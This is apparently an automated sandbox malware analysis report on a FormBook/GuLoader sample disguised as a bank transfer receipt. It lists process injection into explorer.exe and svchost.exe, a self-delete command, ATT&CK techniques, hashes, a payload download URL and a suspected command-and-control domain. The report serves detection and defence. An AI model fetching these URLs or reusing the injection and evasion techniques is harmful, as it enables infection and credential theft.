Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]	22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]	22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA6C0A mov eax, dword ptr fs:[00000030h]	22_2_03AA6C0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]	22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]	22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF740D mov eax, dword ptr fs:[00000030h]	22_2_03AF740D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE1C06 mov eax, dword ptr fs:[00000030h]	22_2_03AE1C06
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h]	22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF4015 mov eax, dword ptr fs:[00000030h]	22_2_03AF4015
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]	22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]	22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AA7016 mov eax, dword ptr fs:[00000030h]	22_2_03AA7016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A4746D mov eax, dword ptr fs:[00000030h]	22_2_03A4746D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AF1074 mov eax, dword ptr fs:[00000030h]	22_2_03AF1074
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03AE2073 mov eax, dword ptr fs:[00000030h]	22_2_03AE2073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]	22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A40050 mov eax, dword ptr fs:[00000030h]	22_2_03A40050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]	22_2_03ABC450
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03ABC450 mov eax, dword ptr fs:[00000030h]	22_2_03ABC450

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F35165 SetFileAttributesA,LdrResolveDelayLoadedAPI,LocalFree,LocalFree,SetCurrentDirectoryA,

0_2_00F35165

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F37360 SetUnhandledExceptionFilter,		0_2_00F37360
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F36C35 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00F36C35

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread register set: target process: 3352			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread register set: target process: 3352			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F315FC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_00F315FC

Source: explorer.exe, 00000015.00000000.740986276.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.727918009.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000015.00000000.756092211.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000015.00000000.729737334.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000015.00000000.741349189.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.756746468.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000015.00000000.728123965.00000000011E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000015.00000000.749218115.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F375A8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00F375A8

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32A7E GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00F32A7E

Stealing of Sensitive Information:

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: nongrav.exe PID: 4520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6932, type: MEMORYSTR

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000000.748060468.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.786650349.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820620569.0000000002D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.790144349.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.821009794.00000000035C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.763232148.00000000075FE000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.820935622.0000000003590000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Path Interception	Access Token Manipulation1	Virtualization/Sandbox Evasion22	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection312	Access Token Manipulation1	LSASS Memory	Security Software Discovery421	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection312	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information4	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing12	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery16	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	15%	Metadefender		Browse
Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	27%	ReversingLabs	Win32.Trojan.Mucc
Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.nongrav.exe.560000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.svchost.exe.3f3796c.4.unpack	100%	Avira	TR/Dropper.Gen	Download File
22.2.svchost.exe.3214020.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
15.1.nongrav.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.nongrav.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.thesocialmediacreator.com/i638/	5%	Virustotal		Browse
www.thesocialmediacreator.com/i638/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.168.46	true	false	high
googlehosted.l.googleusercontent.com	172.217.168.1	true	false	high
doc-0c-ao-docs.googleusercontent.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download	false		high
www.thesocialmediacreator.com/i638/	true	5%, Virustotal, Browse Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.217.168.46	drive.google.com	United States		15169	GOOGLEUS	false
172.217.168.1	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	540355
Start date:	15.12.2021
Start time:	14:09:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/1@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.9% (good quality ratio 37.4%) Quality average: 68.4% Quality standard deviation: 34%
HCA Information:	Successful, ratio: 69% Number of executed functions: 116 Number of non-executed functions: 63
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 2.20.205.141 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	GIQrcXXUF4.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	3Bq5GsrOTq.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	lRD8O9tHC3.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	G-1123031483.xlsb	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	G-1123031483.xlsb	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	hbQlo7Tz3a.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	hRkEruZJxz.msi	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	11zxbQ4J7i.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	c937ab727bd34bd8c83e2ea01054cd60363ca35bd99fc.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	NotaFiscal.msi	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	W12QOvrItk.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	W12QOvrItk.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	PE-1884545009.xlsb	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	vI7zCVA4VT.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	zcLKMY9bzT.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	PP-834172242.xlsb	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	PP-294258015.xlsb	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	enZe4nozsw.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	uPw1TYVGYs.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1
	3EflOSdVsB.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.1

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Download File
Process:	C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.642357579130979
Encrypted:	false
SSDEEP:	1536:hs45GgwFzTYSKUc//9qrMyk3+lGsc5iTq0wHmYt:hN+zTYS5acZk3+lGuqzH7t
MD5:	BEB33BD2BF3282F8C86081144236545D
SHA1:	03114FA621E4944693F897C6A015776F4B81BE2B
SHA-256:	F27110BABA677C03A4A1B87E19D5FB34C96A7E5F5A3D810E132442A240B97827
SHA-512:	DEAC0697F44163BE7AA6FCFAD1A0F7DD7B5BCB9CD9DA36B1DEC47368E14C336B97CE801D7AE938CDF605CCA92618777D062C93D091B3B5D1ECC40F2205E7984D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...9.]H.................`...0...............p....@.................................;........................................d..(...........................................................................8... ....................................text...HZ.......`.................. ..`.data........p.......p..............@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.351689762780545
TrID:	Win32 Executable (generic) a (10002005/4) 97.02% Win32 MS Cabinet Self-Extractor (WExtract stub) (303627/2) 2.95% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
File size:	209920
MD5:	72a345c95142aee60e7df54b570c2c6b
SHA1:	aa479735d39ced67594ff0b0d5f91679e506ac38
SHA256:	a7a0ada5969b3b343a5c2d17e1fe57f542a0f9cb94b98daf7a4922d8cdcd5e8d
SHA512:	597d7673d2d69598d31a2edc71651c285d3253af53c06653a4d1504db9c71575141ace6fbc2371acd0517d43ac0b135c0b213979b657a035cbb1744504d437c7
SSDEEP:	6144:DK6g8ITQp0yN90QEN3Gm7CTon9jiNLk/ybI:DKRy90v30O9TeI
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...n.k.n.k.n.k..^..i.k..^..`.k..^..(.k..^....k.n.j...k..^..g.k.Ig..o.k..^..o.k..^..o.k.Richn.k.................PE..L.....ST...

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General
Entrypoint:	0x4069d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x545301EF [Fri Oct 31 03:28:47 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	3
File Version Major:	6
File Version Minor:	3
Subsystem Version Major:	6
Subsystem Version Minor:	3
Import Hash:	bc70c4fa605f17c85050b7c7b6d42e44

Entrypoint Preview

Instruction
call 00007FCD80BC1808h
jmp 00007FCD80BC0C3Ah
int3
int3
int3
int3
int3
push 0000005Ch
push 00407900h
call 00007FCD80BC18BEh
and dword ptr [ebp-24h], 00000000h
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-6Ch]
push eax
call dword ptr [0040A170h]
mov dword ptr [ebp-04h], FFFFFFFEh
xor ebx, ebx
inc ebx
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov edi, dword ptr [eax+04h]
xor esi, esi
mov edx, 004088ECh
mov ecx, edi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FCD80BC0C38h
cmp eax, edi
jne 00007FCD80BC0C46h
mov esi, ebx
cmp dword ptr [004088F0h], ebx
jne 00007FCD80BC0C49h
push 0000001Fh
call 00007FCD80BC1624h
pop ecx
jmp 00007FCD80BC0C6Eh
push 000003E8h
call dword ptr [0040A16Ch]
jmp 00007FCD80BC0BFCh
cmp dword ptr [004088F0h], 00000000h
jne 00007FCD80BC0C52h
mov dword ptr [004088F0h], ebx
push 00401018h
push 0040100Ch
call 00007FCD80BC0D96h
pop ecx
pop ecx
test eax, eax
je 00007FCD80BC0C3Dh
jmp 00007FCD80BC0D74h
mov dword ptr [00408224h], ebx
cmp dword ptr [004088F0h], ebx
jne 00007FCD80BC0C4Dh
push 00401008h
push 00401000h
call 00007FCD80BC180Ch
pop ecx
pop ecx
mov dword ptr [004088F0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa294	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x2a408	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x37000	0x8c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x10a0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x13d8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x290	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6964	0x6a00	False	0.572044516509	data	6.35037999484	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a8c	0x400	False	0.3232421875	data	3.17592784688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0xa000	0x107c	0x1200	False	0.418402777778	data	5.04714087963	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x2b000	0x2a600	False	0.8237117441	data	7.44533811021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x37000	0x8c0	0xa00	False	0.771875	data	6.37328857441	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xc9f8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf814	0x668	data	English	United States
RT_ICON	0xfe7c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291109880, next used block 28872	English	United States
RT_ICON	0x10164	0x1e8	data	English	United States
RT_ICON	0x1034c	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x10474	0xea8	data	English	United States
RT_ICON	0x1131c	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15066613, next used block 15000828	English	United States
RT_ICON	0x11bc4	0x6c8	data	English	United States
RT_ICON	0x1228c	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x127f4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x201c8	0x25a8	data	English	United States
RT_ICON	0x22770	0x10a8	data	English	United States
RT_ICON	0x23818	0x988	data	English	United States
RT_ICON	0x241a0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x24608	0x2f2	data	English	United States
RT_DIALOG	0x248fc	0x1b0	data	English	United States
RT_DIALOG	0x24aac	0x166	data	English	United States
RT_DIALOG	0x24c14	0x1c0	data	English	United States
RT_DIALOG	0x24dd4	0x130	data	English	United States
RT_DIALOG	0x24f04	0x120	data	English	United States
RT_STRING	0x25024	0x8c	data	English	United States
RT_STRING	0x250b0	0x520	data	English	United States
RT_STRING	0x255d0	0x5cc	data	English	United States
RT_STRING	0x25b9c	0x4b0	data	English	United States
RT_STRING	0x2604c	0x44a	data	English	United States
RT_STRING	0x26498	0x3ce	data	English	United States
RT_RCDATA	0x26868	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x26870	0xf062	Microsoft Cabinet archive data, 61538 bytes, 1 file	English	United States
RT_RCDATA	0x358d4	0x4	data	English	United States
RT_RCDATA	0x358d8	0x24	data	English	United States
RT_RCDATA	0x358fc	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x35904	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x3590c	0x4	data	English	United States
RT_RCDATA	0x35910	0x7	ASCII text, with no line terminators	English	United States
